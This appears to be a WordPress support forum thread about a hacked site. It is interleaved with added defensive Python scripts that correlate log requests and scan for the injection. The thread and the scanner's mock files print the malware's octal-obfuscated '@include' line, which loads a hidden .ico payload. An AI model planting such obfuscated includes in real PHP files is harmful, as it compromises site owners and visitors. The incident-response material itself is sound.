• Every night shortly after midnight, Apache logs show a request to our site:
    /wp/wp-admin/includes/upgrade.php

    It does all this:
    – Chmod 755 to /var/www/html
    – Changes wp-settings.php source to include at the top a line like this:
    @include "\057var\057www\057htm\154/we\142ima\147es/\155oto\157nly\057.b2\067841\067f.i\143o";
    – it changes index.php in root to include that same line
    – it changes all index.php in subfolders that are available to users for uploading data to include that same line
    – In some random folder it installs an object called something like .c8981bb4.ico

    A few seconds after it has done that, the Apache log shows a new request to the server with something like:
    /mtc/?kfog=7le
    or, alternatively
    /webimages/someotherfoldersforupload/abcdefgh.php
    (abcdefgh can be any 8 character long sequence).

    It doesn't seem to do any harm, as the site is working properly and there is no unusual network traffic that can be observed.

    WordPress and all plugins are on the very latest version. Unneeded plugins and themes have all been removed.

    Sucuri shows that wp-settings has been changed and I can repair it every morning without problem.

    So the question really is, as everything is at the latest version, how is it possible that /wp/wp-admin/includes/upgrade.php is allowed to create this mess?
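The two-stage pattern the post describes (a hit on wp-admin/includes/upgrade.php, then a request to /mtc/?... or to an 8-character .php file in an upload directory a few seconds later) is easy to pick out of an access log once you key on the trigger. The script below is an added example, not code from the thread or from WordPress: it parses constructed Apache combined-log lines (the client addresses, dates, sizes and the dropper name qwertyui.php are made up; only the request shapes come from the post), and correlates a trigger with a second-stage request from the same client within an assumed 60-second window.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format. Client IPs, dates,
# sizes and the 8-character dropper name are made up for this example; only the
# request shapes (upgrade.php, /mtc/?..., /webimages/.../xxxxxxxx.php) come from the post.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Mar/2019:00:04:11 +0000] "POST /wp/wp-admin/includes/upgrade.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Mar/2019:00:04:14 +0000] "GET /mtc/?kfog=7le HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Mar/2019:08:15:02 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Mar/2019:00:03:58 +0000] "GET /wp/wp-admin/includes/upgrade.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Mar/2019:00:04:03 +0000] "GET /webimages/gallery/qwertyui.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Mar/2019:12:00:00 +0000] "GET /webimages/gallery/photo.jpg HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# wp-admin/includes/upgrade.php is a function library that WordPress pulls in
# with require_once from wp-admin/upgrade.php and install.php; nothing in normal
# operation requests it over HTTP, so any direct hit on it is the trigger.
TRIGGER = "/wp-admin/includes/upgrade.php"
# Second-stage shapes reported in the post: /mtc/?<random>=<random>, or an
# 8-character .php file under the user-upload directory (webimages/ here).
FOLLOWUP_RE = re.compile(r"^/mtc/\?|^/webimages/.*/[A-Za-z0-9]{8}\.php$")
WINDOW = timedelta(seconds=60)   # assumption standing in for "a few seconds"


def parse(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_sequences(log_text, window=WINDOW):
    """Return (trigger, followup) pairs: a request to upgrade.php followed within
    `window` by a second-stage request from the same client address."""
    entries = [e for e in map(parse, log_text.splitlines()) if e]
    entries.sort(key=lambda e: e["ts"])
    hits = []
    for i, trig in enumerate(entries):
        if TRIGGER not in trig["path"]:          # the site may live under /wp/
            continue
        for nxt in entries[i + 1:]:
            if nxt["ts"] - trig["ts"] > window:
                break                            # entries are time-ordered
            if nxt["ip"] == trig["ip"] and FOLLOWUP_RE.match(nxt["path"]):
                hits.append((trig, nxt))
    return hits


if __name__ == "__main__":
    for trig, nxt in find_sequences(SAMPLE_LOG):
        print(f"{trig['ts']:%Y-%m-%d %H:%M:%S} {trig['ip']} {trig['path']}"
              f" -> +{(nxt['ts'] - trig['ts']).seconds}s {nxt['path']}")
```

Run it against the real access log by replacing SAMPLE_LOG with the file contents. The same-address condition is an assumption; if the second-stage request comes from a different client, drop the `nxt["ip"] == trig["ip"]` test and rely on the path shape and the time window alone. Note what the correlation does and does not tell you: it dates each nightly visit and names the dropped file, but a request to upgrade.php cannot by itself rewrite index.php or wp-settings.php; the code doing that is already on the server and has to be found on disk.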

Viewing 3 replies - 1 through 3 (of 3 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Thread Starter clauderoe

    (@clauderoe)

    Yes, I know this guide and all the security measures and have done all of it.
    But it remains that a core WP program (/wp-admin/includes/upgrade.php) is doing something that it shouldn't.
    And Sucuri does not complain about it…

    So, any other suggestions?

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    If your site is hacked, bad code could be telling your site to do bad things. It’s also possible that your host has issues.

    Replace EVERY SINGLE php file on your site with ones from the original sources. Examine all .htaccess files, look at wp-config.php carefully.
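Before (and after) replacing every PHP file, it helps to know exactly which files carry the injection and where it points. The scanner below is an added example, not code from the thread, from Sucuri or from WordPress: it decodes the PHP octal escapes in the `@include` line quoted in the original post (so the hidden target path becomes readable), walks a document root for that kind of include at the top of .php files, and flags dot-prefixed .ico files that contain PHP rather than icon data. The directory it scans is a constructed mock of the layout the post describes, built in a temporary directory; the payload file body is a placeholder, not the real dropped code.

```python
import os
import re
import tempfile

# The injected line reads   @include "\057var\057www...";   PHP resolves \NNN
# octal escapes inside double-quoted strings, so the real path never appears
# literally in the file and a grep for "webimages" or ".ico" misses it.
INJECT_RE = re.compile(r"""@include\s*(['"])(.+?)\1\s*;""")
OCTAL_RE = re.compile(r"\\([0-7]{1,3})")


def decode_php_octal(s):
    """Resolve PHP double-quoted-string octal escapes (\\057 -> '/')."""
    return OCTAL_RE.sub(lambda m: chr(int(m.group(1), 8)), s)


def injected_includes(path):
    """Return the decoded targets of every @include "<literal>"; near the top of a PHP file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        head = fh.read(4096)            # the injection is prepended, so the head suffices
    targets = []
    for m in INJECT_RE.finditer(head):
        quote, literal = m.group(1), m.group(2)
        # only double-quoted PHP strings resolve \NNN escapes
        targets.append(decode_php_octal(literal) if quote == '"' else literal)
    return targets


def ico_contains_php(path):
    """A real .ico starts with a 00 00 01 00 header; a dropped payload starts with <?php."""
    with open(path, "rb") as fh:
        return b"<?" in fh.read(4096)


def scan_tree(root):
    """Walk a document root and report injected includes and PHP hidden in dot-.ico files."""
    found = {"includes": [], "hidden_ico_php": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name.endswith(".php"):
                for target in injected_includes(full):
                    found["includes"].append((rel, target))
            elif name.startswith(".") and name.endswith(".ico") and ico_contains_php(full):
                found["hidden_ico_php"].append(rel)
    found["includes"].sort()
    found["hidden_ico_php"].sort()
    return found


def build_sample_tree():
    """Constructed stand-in for the infected layout in the post (not a real site)."""
    root = tempfile.mkdtemp(prefix="wpscan_")
    os.makedirs(os.path.join(root, "webimages", "uploads"))
    # The escaped line quoted in the post, exactly as it sits in the PHP source.
    inj = r'@include "\057var\057www\057htm\154/we\142ima\147es/\155oto\157nly\057.b2\067841\067f.i\143o";' + "\n"
    files = {
        "index.php": "<?php\n" + inj + "define('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "wp-settings.php": "<?php\n" + inj + "// remainder of the real wp-settings.php follows\n",
        "webimages/uploads/index.php": "<?php\n" + inj + "// Silence is golden.\n",
        "wp-load.php": "<?php\n// untouched file, nothing injected\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    with open(os.path.join(root, "webimages", ".c8981bb4.ico"), "wb") as fh:
        fh.write(b"<?php /* constructed stand-in for the dropped payload */ echo 1;\n")
    with open(os.path.join(root, "favicon.ico"), "wb") as fh:
        fh.write(b"\x00\x00\x01\x00")  # genuine ICO header, not PHP
    return root


if __name__ == "__main__":
    result = scan_tree(build_sample_tree())
    for rel, target in result["includes"]:
        print(f"injected include in {rel}: {target}")
    for rel in result["hidden_ico_php"]:
        print(f"PHP code inside hidden icon {rel}")
```

Point `scan_tree` at the real document root instead of `build_sample_tree()`. Decoding the string from the post gives `/var/www/html/webimages/motoonly/.b278417f.ico`, which is why the hidden .ico files are the part to remove first: every patched index.php only loads that payload. Treat a clean result as necessary, not sufficient. The scanner matches one known pattern, and the moderator's advice still stands: replace every PHP file from the original sources and read .htaccess and wp-config.php by hand, since anything that re-applies the injection each night will not look like this include line.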

  • The topic ‘Site hacked’ is closed to new replies.